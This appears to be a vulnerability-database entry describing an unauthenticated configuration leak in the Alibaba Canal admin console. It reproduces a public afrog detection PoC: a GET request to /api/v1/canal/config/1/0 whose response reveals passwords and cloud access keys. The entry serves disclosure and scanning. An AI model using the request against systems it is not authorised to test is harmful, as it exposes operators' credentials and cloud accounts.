alibaba-canal-config-leak: Alibaba Canal config 云密钥信息泄露漏洞

日期: 2025-09-01 | 影响软件: Alibaba Canal | POC: 已公开

漏洞描述

由于/api/v1/canal/config 未进行权限验证可直接访问，导致账户密码、accessKey、secretKey等一系列敏感信息泄露 title="Canal Admin"

PoC代码[已公开]

id: alibaba-canal-config-leak

info:
  name: Alibaba Canal config 云密钥信息泄露漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    由于/api/v1/canal/config 未进行权限验证可直接访问，导致账户密码、accessKey、secretKey等一系列敏感信息泄露
    title="Canal Admin"
  reference:
    - http://wiki.peiqi.tech/wiki/webapp/AlibabaCanal/Alibaba%20Canal%20config%20%E4%BA%91%E5%AF%86%E9%92%A5%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /api/v1/canal/config/1/0
    expression: response.status == 200 && response.body.bcontains(b'"code":20000') && response.body.bcontains(b'"name":"canal.properties"')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/alibaba-canal-config-leak.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

alibaba-canal-default-password: Alibaba Canal Default Password POC

alibaba-canal-info-leak: Alibaba Canal Information Leak POC

阿里巴巴 Canal弱口令 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

阿里巴巴 Canal弱口令无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC